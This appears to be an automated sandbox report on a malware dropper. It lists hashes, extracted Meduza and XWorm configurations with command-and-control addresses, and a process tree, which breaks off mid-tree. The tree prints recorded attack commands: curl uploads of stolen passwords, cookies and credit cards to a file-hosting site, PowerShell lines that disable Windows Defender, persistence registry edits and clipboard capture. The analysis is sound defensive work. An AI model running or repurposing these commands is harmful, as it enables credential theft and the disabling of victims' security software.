Resubmissions

16-12-2024 05:27

241216-f5kx6awmh1 10

14-12-2024 20:23

241214-y6jqlasrhy 10

14-12-2024 20:22

241214-y51bysvmbk 10

14-12-2024 20:13

241214-yzc98svkfr 10

14-12-2024 13:14

241214-qgw1masrcy 10

14-12-2024 13:12

241214-qfk7qsvlaq 3

12-12-2024 18:19

241212-wymq6ssnat 10

12-12-2024 18:16

241212-www7tssmet 10

Analysis

  • max time kernel
    146s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-12-2024 05:27

General

  • Target

    New Text Document mod.exe

  • Size

    8KB

  • MD5

    69994ff2f00eeca9335ccd502198e05b

  • SHA1

    b13a15a5bea65b711b835ce8eccd2a699a99cead

  • SHA256

    2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2

  • SHA512

    ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3

  • SSDEEP

    96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1

Malware Config

Extracted

Family

meduza

C2

193.3.19.151

Attributes
  • anti_dbg

    true

  • anti_vm

    true

  • build_name

    hellres

  • extensions

    .txt; .doc; .xlsx

  • grabber_max_size

    4.194304e+06

  • port

    15666

  • self_destruct

    false

Extracted

Family

xworm

Version

5.0

C2

45.141.26.234:7000

Mutex

2XLzSYLZvUJjDK3V

Attributes
  • Install_directory

    %ProgramData%

  • install_file

    Java Update (32bit).exe

aes.plain

Signatures

  • Detect Xworm Payload 2 IoCs
  • Meduza

    Meduza is a crypto wallet and info stealer written in C++.

  • Meduza Stealer payload 9 IoCs
  • Meduza family
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 1 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 2 IoCs
  • Redline family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

    Using powershell.exe command.

  • Downloads MZ/PE file
  • Drops file in Drivers directory 3 IoCs
  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 34 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 10 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 42 IoCs
  • Looks up external IP address via web service 11 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • UPX packed file 64 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Kills process with taskkill 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 2 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    PID:3484
    • C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
      "C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
      2⤵
      • Checks computer location settings
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4244
      • C:\Users\Admin\AppData\Local\Temp\a\frnd.exe
        "C:\Users\Admin\AppData\Local\Temp\a\frnd.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2144
        • C:\Users\Admin\AppData\Local\Temp\a\frnd.exe
          "C:\Users\Admin\AppData\Local\Temp\a\frnd.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2400
      • C:\Users\Admin\AppData\Local\Temp\a\hellres.exe
        "C:\Users\Admin\AppData\Local\Temp\a\hellres.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1964
      • C:\Users\Admin\AppData\Local\Temp\a\duschno.exe
        "C:\Users\Admin\AppData\Local\Temp\a\duschno.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:2088
      • C:\Users\Admin\AppData\Local\Temp\a\resp.exe
        "C:\Users\Admin\AppData\Local\Temp\a\resp.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1464
      • C:\Users\Admin\AppData\Local\Temp\a\frnd1.exe
        "C:\Users\Admin\AppData\Local\Temp\a\frnd1.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2824
        • C:\Users\Admin\AppData\Local\Temp\a\frnd1.exe
          "C:\Users\Admin\AppData\Local\Temp\a\frnd1.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Accesses Microsoft Outlook profiles
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • outlook_office_path
          • outlook_win_path
          PID:4824
      • C:\Users\Admin\AppData\Local\Temp\a\zx.exe
        "C:\Users\Admin\AppData\Local\Temp\a\zx.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:5016
        • C:\Users\Admin\AppData\Local\Temp\a\zx.exe
          "C:\Users\Admin\AppData\Local\Temp\a\zx.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3928
      • C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
        "C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:2560
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe" & rd /s /q "C:\ProgramData\VKNG4E3OZMOZ" & exit
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1464
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 10
            5⤵
            • System Location Discovery: System Language Discovery
            • Delays execution with timeout.exe
            PID:3468
      • C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe
        "C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:2832
      • C:\Users\Admin\AppData\Local\Temp\a\x.exe
        "C:\Users\Admin\AppData\Local\Temp\a\x.exe"
        3⤵
        • Checks computer location settings
        • Drops startup file
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:388
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\x.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2008
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3664
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Java Update (32bit).exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1768
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Java Update (32bit).exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4596
      • C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe
        "C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe"
        3⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4348
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2264
      • C:\Users\Admin\AppData\Local\Temp\a\system32.exe
        "C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
        3⤵
        • Executes dropped EXE
        PID:916
        • C:\Users\Admin\AppData\Local\Temp\a\system32.exe
          "C:\Users\Admin\AppData\Local\Temp\a\system32.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4900
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "ver"
            5⤵
              PID:4392
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
              5⤵
                PID:5008
                • C:\Windows\System32\wbem\WMIC.exe
                  C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
                  6⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4036
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f"
                5⤵
                  PID:4876
                  • C:\Windows\system32\reg.exe
                    reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /f
                    6⤵
                    • Modifies registry key
                    PID:1180
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f"
                  5⤵
                    PID:2040
                    • C:\Windows\system32\reg.exe
                      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v empyrean /t REG_SZ /d C:\Users\Admin\AppData\Roaming\empyrean\run.bat /f
                      6⤵
                      • Adds Run key to start application
                      • Modifies registry key
                      PID:4472
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
                    5⤵
                      PID:2620
                      • C:\Windows\System32\wbem\WMIC.exe
                        C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
                        6⤵
                          PID:3260
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
                        5⤵
                          PID:3468
                          • C:\Windows\System32\wbem\WMIC.exe
                            C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
                            6⤵
                              PID:4268
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "C:\Windows\System32\wbem\WMIC.exe csproduct get uuid"
                            5⤵
                              PID:1760
                              • C:\Windows\System32\wbem\WMIC.exe
                                C:\Windows\System32\wbem\WMIC.exe csproduct get uuid
                                6⤵
                                  PID:2188
                          • C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe
                            "C:\Users\Admin\AppData\Local\Temp\a\fcxcx.exe"
                            3⤵
                            • Executes dropped EXE
                            • System Location Discovery: System Language Discovery
                            PID:2904
                          • C:\Users\Admin\AppData\Local\Temp\a\Update.exe
                            "C:\Users\Admin\AppData\Local\Temp\a\Update.exe"
                            3⤵
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of SetThreadContext
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1100
                            • C:\Windows\system32\svchost.exe
                              "C:\Windows\system32\svchost.exe"
                              4⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4380
                            • C:\Windows\system32\msiexec.exe
                              "C:\Windows\system32\msiexec.exe"
                              4⤵
                              • Adds Run key to start application
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3136
                            • C:\Windows\system32\audiodg.exe
                              "C:\Windows\system32\audiodg.exe"
                              4⤵
                              • Adds Run key to start application
                              • Suspicious behavior: EnumeratesProcesses
                              PID:3856
                          • C:\Users\Admin\AppData\Local\Temp\a\main.exe
                            "C:\Users\Admin\AppData\Local\Temp\a\main.exe"
                            3⤵
                            • Executes dropped EXE
                            PID:4712
                            • C:\Users\Admin\AppData\Local\Temp\a\main.exe
                              "C:\Users\Admin\AppData\Local\Temp\a\main.exe"
                              4⤵
                              • Executes dropped EXE
                              PID:3952
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /c
                                5⤵
                                  PID:3192
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c
                                  5⤵
                                    PID:4012
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c
                                    5⤵
                                      PID:3628
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c mode con: cols=125 lines=35
                                      5⤵
                                        PID:2940
                                        • C:\Windows\system32\mode.com
                                          mode con: cols=125 lines=35
                                          6⤵
                                            PID:3388
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c cls
                                          5⤵
                                            PID:3704
                                          • C:\Windows\System32\wbem\WMIC.exe
                                            C:\Windows\System32\wbem\WMIC.exe csproduct get UUID
                                            5⤵
                                              PID:4992
                                        • C:\Users\Admin\AppData\Local\Temp\a\tmp.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\tmp.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:3556
                                        • C:\Users\Admin\AppData\Local\Temp\a\shost.exe
                                          "C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
                                          3⤵
                                          • Executes dropped EXE
                                          PID:5040
                                          • C:\Users\Admin\AppData\Local\Temp\a\shost.exe
                                            "C:\Users\Admin\AppData\Local\Temp\a\shost.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            PID:1436
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"
                                              5⤵
                                                PID:816
                                                • C:\Windows\system32\taskkill.exe
                                                  taskkill /im firefox.exe /t /f
                                                  6⤵
                                                  • Kills process with taskkill
                                                  PID:1588
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile"
                                                5⤵
                                                  PID:4684
                                                  • C:\Windows\system32\curl.exe
                                                    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckpasswords.txt" https://store4.gofile.io/uploadFile
                                                    6⤵
                                                      PID:228
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile"
                                                    5⤵
                                                      PID:4816
                                                      • C:\Windows\system32\curl.exe
                                                        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcookies.txt" https://store4.gofile.io/uploadFile
                                                        6⤵
                                                          PID:3276
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile"
                                                        5⤵
                                                          PID:556
                                                          • C:\Windows\system32\curl.exe
                                                            curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckcreditcards.txt" https://store4.gofile.io/uploadFile
                                                            6⤵
                                                              PID:4876
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile"
                                                            5⤵
                                                              PID:2008
                                                              • C:\Windows\system32\curl.exe
                                                                curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckautofill.txt" https://store4.gofile.io/uploadFile
                                                                6⤵
                                                                  PID:2864
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile"
                                                                5⤵
                                                                  PID:3976
                                                                  • C:\Windows\system32\curl.exe
                                                                    curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckhistory.txt" https://store4.gofile.io/uploadFile
                                                                    6⤵
                                                                      PID:2172
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile"
                                                                    5⤵
                                                                      PID:3732
                                                                      • C:\Windows\system32\curl.exe
                                                                        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckparsedcookies.txt" https://store4.gofile.io/uploadFile
                                                                        6⤵
                                                                          PID:2664
                                                                      • C:\Windows\system32\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile"
                                                                        5⤵
                                                                          PID:3076
                                                                          • C:\Windows\system32\curl.exe
                                                                            curl -F "file=@C:\Users\Admin\AppData\Local\Temp\muckbookmarks.txt" https://store4.gofile.io/uploadFile
                                                                            6⤵
                                                                              PID:8
                                                                      • C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:4056
                                                                        • C:\Users\Admin\AppData\Local\Temp\a\qhos.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\a\qhos.exe"
                                                                          4⤵
                                                                          • Executes dropped EXE
                                                                          PID:100
                                                                      • C:\Users\Admin\AppData\Local\Temp\a\phost.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
                                                                        3⤵
                                                                        • Executes dropped EXE
                                                                        PID:1104
                                                                        • C:\Users\Admin\AppData\Local\Temp\a\phost.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\a\phost.exe"
                                                                          4⤵
                                                                          • Drops file in Drivers directory
                                                                          • Executes dropped EXE
                                                                          PID:4388
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\phost.exe'"
                                                                            5⤵
                                                                              PID:1108
                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\phost.exe'
                                                                                6⤵
                                                                                • Command and Scripting Interpreter: PowerShell
                                                                                PID:4588
                                                                            • C:\Windows\system32\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                                              5⤵
                                                                                PID:3700
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                                                  6⤵
                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                  PID:2624
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()""
                                                                                5⤵
                                                                                  PID:3568
                                                                                  • C:\Windows\system32\mshta.exe
                                                                                    mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Verify your permission and try again.', 0, 'Access Denied', 48+16);close()"
                                                                                    6⤵
                                                                                      PID:3184
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                    5⤵
                                                                                      PID:2344
                                                                                      • C:\Windows\system32\tasklist.exe
                                                                                        tasklist /FO LIST
                                                                                        6⤵
                                                                                        • Enumerates processes with tasklist
                                                                                        PID:2008
                                                                                    • C:\Windows\system32\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                                                      5⤵
                                                                                        PID:760
                                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                                          wmic csproduct get uuid
                                                                                          6⤵
                                                                                            PID:3688
                                                                                        • C:\Windows\system32\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
                                                                                          5⤵
                                                                                            PID:2160
                                                                                            • C:\Windows\system32\reg.exe
                                                                                              REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
                                                                                              6⤵
                                                                                                PID:2876
                                                                                            • C:\Windows\system32\cmd.exe
                                                                                              C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
                                                                                              5⤵
                                                                                                PID:4292
                                                                                                • C:\Windows\system32\reg.exe
                                                                                                  REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
                                                                                                  6⤵
                                                                                                    PID:5056
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                  5⤵
                                                                                                    PID:5024
                                                                                                    • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                      wmic path win32_VideoController get name
                                                                                                      6⤵
                                                                                                      • Detects videocard installed
                                                                                                      PID:4544
                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                    5⤵
                                                                                                      PID:4660
                                                                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                        wmic path win32_VideoController get name
                                                                                                        6⤵
                                                                                                        • Detects videocard installed
                                                                                                        PID:3532
                                                                                                    • C:\Windows\system32\cmd.exe
                                                                                                      C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‌  ‌.scr'"
                                                                                                      5⤵
                                                                                                        PID:68
                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‌‌  ‌.scr'
                                                                                                          6⤵
                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                          PID:1736
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                        5⤵
                                                                                                          PID:2000
                                                                                                          • C:\Windows\system32\tasklist.exe
                                                                                                            tasklist /FO LIST
                                                                                                            6⤵
                                                                                                            • Enumerates processes with tasklist
                                                                                                            PID:1524
                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                          5⤵
                                                                                                            PID:4044
                                                                                                            • C:\Windows\system32\tasklist.exe
                                                                                                              tasklist /FO LIST
                                                                                                              6⤵
                                                                                                              • Enumerates processes with tasklist
                                                                                                              PID:3108
                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                                                                            5⤵
                                                                                                              PID:2588
                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                6⤵
                                                                                                                  PID:4292
                                                                                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                                                                                  WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                                                                                  6⤵
                                                                                                                    PID:1964
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                                                                                  5⤵
                                                                                                                  • Clipboard Data
                                                                                                                  PID:2952
                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell Get-Clipboard
                                                                                                                    6⤵
                                                                                                                    • Clipboard Data
                                                                                                                    PID:2072
                                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                  5⤵
                                                                                                                    PID:4960
                                                                                                                    • C:\Windows\system32\tasklist.exe
                                                                                                                      tasklist /FO LIST
                                                                                                                      6⤵
                                                                                                                      • Enumerates processes with tasklist
                                                                                                                      PID:1696
                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                    5⤵
                                                                                                                      PID:4824
                                                                                                                      • C:\Windows\system32\tree.com
                                                                                                                        tree /A /F
                                                                                                                        6⤵
                                                                                                                          PID:1820
                                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                                        C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
